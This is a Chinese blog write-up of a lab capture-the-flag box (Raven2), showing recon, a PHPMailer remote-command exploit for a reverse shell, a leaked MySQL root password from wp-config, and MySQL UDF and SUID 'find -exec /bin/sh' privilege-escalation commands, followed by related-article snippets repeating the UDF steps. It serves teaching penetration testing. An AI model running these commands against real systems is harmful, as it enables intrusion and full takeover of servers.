Linux提权(mysql UDF提权)

最新推荐文章于 2024-04-25 20:47:12 发布
最新推荐文章于 2024-04-25 20:47:12 发布
阅读量2.1k 收藏 7
点赞数 1
分类专栏: 内网渗透 文章标签: linux web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waxcj/article/details/128343131
版权

靶机为vulhub靶场中的Raven2

攻击机kali2021(192.168.61.128)

靶机Raven2(192.168.61.148)

1:信息收集(masscan+nmap)

masscan扫描内网存活主机(快)

nmap扫描端口开放情况

发现开放了22,80,111端口,操作系统为Linux

访问靶机80端口 利用插件查看中间件和指纹版本(语言为PHP)

 目录扫描(dirb)发现靶机是wordpress建站(可以用wpscan扫描有没有wordpress漏洞)

此外还发现另外一个目录/vendor目录,访问目录发现存在目录遍历

翻看文件README.md文件得知为phpmailer,百度phpmailer知道是一个php发送邮件的程序,且版本小于5.2.18存在漏洞远程命令执行漏洞,查看当前version版本为5.2.16

这里我使用python脚本,复制脚本到桌面

编辑脚本

将target改为攻击目标记得加上/contact,否则无法反弹会话回来,backdoor为生成的后门文件,payload改为kali的ip和监听的端口,email那把路径改为目标机的网站根路径,可以在/vendor中查找到网站根目录(msf上也有脚本,但是我用的时候不能直接弹回会话)

然后直接python执行

这样就执行成功了,只需要访问后门地址就可以弹回shell

 执行whoami发现为www-date权限

使用python执行交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

也可以写一句话用菜刀蚁剑连接方便操作

udf提权

使用蚁剑上传LinEnum.sh脚本进行提权信息收集

上传到tmp目录下 

运行脚本发现有mysql数据库,且无法直接使用SUID提权

查找数据库配置文件(/var/www/html/wordpress/wp-config.php)

账号root,密码R3v3nSecurity

使用蚁剑登录mysql数据库,进行mysql udf提权

kali上搜索Linux udf提权脚本

将脚本文件在本地进行编译后上传到靶机的/tmp目录下

gcc -g -c 1518.c

gcc -g -shared -o 1518.so 1518.o

将1518.so文件通过蚁剑上传到靶机/tmp目录下

 进入数据库进行udf提权

use mysql; #进入数据库

create table foo(line blob); #创建数据表

foo insert into foo values(load_file('/tmp/icepeak.so')); #插入数据

select * from foo into dumpfile '/usr/lib/mysql/plugin/icepeak.so'; #( Foo表成功插入二进制数据, 然后利用dumpfile函数把文件导出 outfile 多行导出,dumpfile一行导出 outfile会有特殊的转换,而dumpfile是原数据导出 新建存储函数)

create function do_system returns integer soname 'icepeak.so'; #(创建自定义函数do_system 类型是integer,别名 soname文件名字然后查询函数是否创建成功)

select * from mysql.func;

使用 find / -user root -perm -4000 -print 2>/dev/null查看SUID提权

touch lsec(自定义名称)

find lsec -exec "whoami" \;
find lsec -exec "/bin/sh" \;

查看最终flag

                                

 

 

 

 

 

LZsec
关注
专栏目录
linux mysql udf 提权
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 954
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
linuxudf提权_MYSQL提权--UDF提权
weixin_35507450的博客
01-17 1250
前言:udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限什么是UDFudf(Userdefined function)是用户自定义函数在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REALSTRING ...
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
linux环境下的MySQL UDF提权
最新发布
黑战士的博客
04-25 1632
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
linux提权——Mysql UDF提权
qq_55202378的博客
04-12 656
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件。
UDF提权linux
m0_66299232的博客
05-23 1500
secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权。大概就是将程序进行gcc编译,然后再登录mysql进行创建一个表,插入.so文件,创建自定义函数进行越权操作。#secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权。#secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
linuxudf提权_udf提权
weixin_34862561的博客
01-14 1037
0x00前言:udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限0x01什么是udfudf(Userdefined function)是用户自定义函数在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REA...
MySQL UDF 提权
small_cat's home
10-22 1896
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
渗透测试:数据库UDF提权linux
qq_63442530的博客
04-01 2025
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行提权提权原理:攻击者通过编写,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库中通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库中调用该自定义函数能够使用系统命令。
mysql udf提权_mysql——udf提权
weixin_39958025的博客
12-05 153
01前言udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。02思路1.将udf文件上传到指定位置sqlmap中有现成的udf文件,有linux版本和windows版本分为32位和64位,...
linuxudf提权_LinuxMySQL UDF 提权小记
weixin_42356307的博客
01-14 247
实验环境:Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3可用POC:https://0xdeadbeef.info/exploits/raptor_udf2.chttps://www.exploit-db.com/exploits/1518/提权步骤:* $ id* uid=500(raptor)...
Linux mysql root 提权
12-30 4573
* Usage:  * $ id  * uid=500(raptor) gid=500(raptor) groups=500(raptor)  * $ gcc -g -c raptor_udf.c  * $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc  * $ mysql -u ro
mysql提权方式linux_Linux提权的几种常用方式
weixin_32631729的博客
01-28 1955
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,...
linuxudf提权_记一次UDF提权
weixin_42386819的博客
02-26 197
为了要拿一个服务器上的源码,目标主要是伪静态的。程序是maxcms。木有漏洞。于是就只能c段了。在c段搞了一个shell。过程就不说了。简单看了下支持php,不支持aspx。组件也删除了。整个盘都翻来覆去的,没什么直接可用的,就试了下网站的上级目录,既然可以跨。既然支持 php,就扫了下端口,开了3389、3306很好,翻到了一个php的站,在配置里看到了root密码,又继续翻到多个php站点,m...
sqlmap mysql udf提权_Mysql提权-基于MysqlUDF提权Linux系统)
weixin_34696006的博客
01-30 786
基于MysqlUDF提权(Linux系统)【实验目的】??通过本实验理解如何通过webshell结合sqlmap自带的dll文件对Linux系统进行UDF提权,熟悉UDF提权的主要方法。【实验环境】攻击机:Kali-pri用户名college,密码360College目标靶机:CentOS-sqli-lab用户名college,密码360College【实验原理】??scp命令简介:??scp是...
linuxmysql提权
weixin_30347335的博客
03-18 555
linux提权,本文为您讲述一种linux提权方法,这是一种常见的linux提权技术.. linux系统环境下,mysql以root权限登录时提权 mysql5.x 的linux版本下面有一个函数,可以帮助我们干很多猥琐的事情,这个函数4。x下面貌似没有,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的 明天再看看函数手册,再装一个实验一下。 mysql 5.x里面引入了...
linux udf提权
09-11
Linux中,通过使用UDF(用户定义函数)来提权是可能的。UDF是一种在MySQL中执行特定功能的自定义函数。为了在Linux中使用UDF提权,你需要执行以下步骤: 1. 首先,创建一个函数库文件(.so文件),并将其加载到MySQL中。可以使用以下命令创建函数库文件: ``` create function do_system returns integer soname 'udf.so'; ``` 这个命令会创建一个名为do_system的函数,该函数将执行系统命令。 2. 接下来,将函数库文件导入到MySQL的插件目录中。可以使用以下命令将文件导入到指定目录: ``` select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so'; ``` 这个命令将函数库文件导入到/usr/lib/mysql/plugin/目录中,这是MySQL插件的默认位置。 3. 在完成上述步骤后,你需要确保MySQL安全设置允许UDF提权。可以通过执行以下命令来检查相关的MySQL变量: ``` show global variables like '%secure_file_priv%'; show variables like '%secure%'; ``` 你需要确保secure_file_priv变量没有设置为NULL,或者设置为函数库文件所在的目录。如果secure_file_priv的值为NULL,则导入和导出操作将被限制,无法进行提权。如果secure_file_priv的值为/tmp/,则导入和导出操作将被限制为/tmp/目录。只有当secure_file_priv的值没有具体值时,才可以进行提权操作。 4. 最后,使用以下命令查看插件的位置: ``` show variables like '%plugin%'; ``` 确保函数库文件被正确地导入到插件目录中。 通过执行以上步骤,你可以在Linux中使用UDF来实现提权。请注意,UDF提权可能存在安全风险,请谨慎操作,并确保只在必要时使用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值